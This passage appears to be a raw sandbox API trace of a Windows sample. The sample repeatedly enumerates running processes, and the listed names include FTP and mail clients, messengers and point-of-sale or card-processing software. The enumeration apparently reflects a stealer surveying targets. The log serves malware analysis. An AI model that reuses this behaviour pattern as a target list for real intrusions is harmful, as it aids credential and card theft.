lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0253.609] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0253.610] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0253.612] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0253.613] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0253.615] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0253.617] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0253.618] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0253.620] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0253.624] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0253.626] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0253.627] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0253.629] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0253.630] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0253.632] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0253.634] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0253.680] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0253.682] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0253.684] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0253.685] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0253.687] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0253.688] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0253.690] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0253.691] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0253.692] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0253.694] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0253.695] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.697] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0253.701] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0253.703] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0253.704] CloseHandle (hObject=0x1018) returned 1 [0253.704] Sleep (dwMilliseconds=0x64) [0253.818] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0253.831] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0253.832] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0253.834] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0253.835] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.836] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0253.838] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0253.842] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0253.844] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0253.845] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0253.846] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.848] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.849] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0253.851] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.852] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.853] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.858] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.859] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.861] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.862] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.863] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.865] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0253.866] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0253.867] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.869] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.922] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0253.923] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0253.925] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0253.926] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0253.928] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.929] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0253.931] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.932] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.936] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0253.938] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0253.939] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0253.941] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0253.942] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0253.943] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0253.945] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0253.946] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0253.953] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0253.958] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0253.960] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0253.961] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0253.963] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0253.987] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0253.989] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0253.991] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0253.993] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0253.994] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0253.998] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0254.000] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0254.001] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0254.003] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 